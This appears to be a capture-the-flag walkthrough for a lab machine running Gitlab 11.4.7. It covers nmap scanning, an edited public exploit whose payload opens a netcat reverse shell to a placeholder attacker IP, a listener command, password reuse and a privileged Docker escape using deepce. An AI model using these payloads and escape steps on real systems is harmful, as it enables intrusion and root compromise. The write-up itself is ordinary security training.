Port Scanning and General Enumeration (Nmap)
nmap -sV -sC -oN nmap/initial -T4 10.10.10.220
22 and ..5080?
Access (searchsploit, gitlab)
Let’s see what version of Gitlab we’re working with
top right, drop down menu
Gitlab version 11.4.7
Checking searchsploit for public exploits for Gitlab 11.4.7
I used the first one but it requires a bit of editing. Here’s what I added:
open(\\'|""" + f'nc -e /bin/bash YOURIP YOURPORT' + """ \\').read\\"]
The original wouldn’t work, this one should. (replace YOURIP and YOURPORT with your listening ip and port, respectively)
Start a listener
nc -lvnp 4444
And run the script!
python3 exploit.py -u YOURUSERNAME -p YOURPASSWORD -g http://10.10.10.220 -l YOURIP -p YOUR PORT
You may want to stabilize your shell at this point. A quick and dirty way to do so is
python3 -c 'import pty; pty.spawn("/bin/bash")' export TERM=xterm
Privesc Part 1 (password-reuse, linpeas)
Linpeas kicks back a lot of juicy informtion, but this box has some curveballs and 90% of it is irrelevant for the completion of this box. This is definitely a case of K.I.S.S.
keep it simple stupid
Main two things we’re after here:
keep that in mind for later
First thing you should always do when you find a plaintext password? Use it! Use it everywhere!
Let’s capture the root fla—
Well, let’s try and escape the docker then!
Privesc Part 2: ESCAPE-trick boogaloo (deepce, docker escape)
First things first when trying to do anything: Enumeration. We’ll be using deepce. It’s very similar to Linpeas. It’s amazing.
The interesting finding:
Running a container as privileged gives us the ability to execute commands as root.
The other cool feature of deepce is it has an exploit mode
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce
you can read about the available exploits by following the link above in Reading/Resources
All that’s left to do is ssh in as the new root user!